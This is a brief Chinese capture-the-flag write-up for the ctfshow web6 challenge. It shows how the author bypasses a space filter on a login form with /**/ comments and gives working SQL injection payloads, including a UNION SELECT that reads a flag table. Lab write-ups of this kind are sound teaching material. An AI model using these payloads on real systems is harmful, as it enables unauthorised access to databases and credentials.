ctfshow-web6

Wcbddd2023-08-07 16:02

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码 
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码 
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
这儿有一堆花10 小时前
一次渗透测试的全过程:从扫描到提权
web安全·网络安全·web
风语者日志10 小时前
CTFSHOW—WEB4
网络·安全·web安全·网络安全·ctf
Andya_net1 天前
网络安全 | 深入了解 X.509 证书及其应用
服务器·安全·web安全
Andya_net2 天前
网络安全 | SSL/TLS 证书文件格式详解:PEM、CRT、CER、DER、PKI、PKCS12
安全·web安全·ssl
jieyu11192 天前
uploads-labs靶场通关(1)
web安全·文件上传漏洞·靶场通关
竹等寒2 天前
Linux-网络安全私房菜(二)
linux·服务器·web安全
white-persist2 天前
CSRF 漏洞全解析:从原理到实战
网络·python·安全·web安全·网络安全·系统安全·csrf
渗透测试老鸟-九青2 天前
网络安全之揭秘APT Discord C2 以及如何取证
安全·web安全·网络安全学习路线
key062 天前
大模型在网络安全领域的应用与评测
网络·人工智能·web安全
数字供应链安全产品选型3 天前
国家级!悬镜安全入选两项“网络安全国家标准应用实践案例”
人工智能·安全·web安全
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03UV安装并设置国内源04Linux下V2Ray安装配置指南05GitLab 零基础入门指南:从安装到项目管理全流程06NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南07一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示08在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)092025软件测试面试八股文(含答案+文档)10XXE 注入漏洞全解析:从原理到实战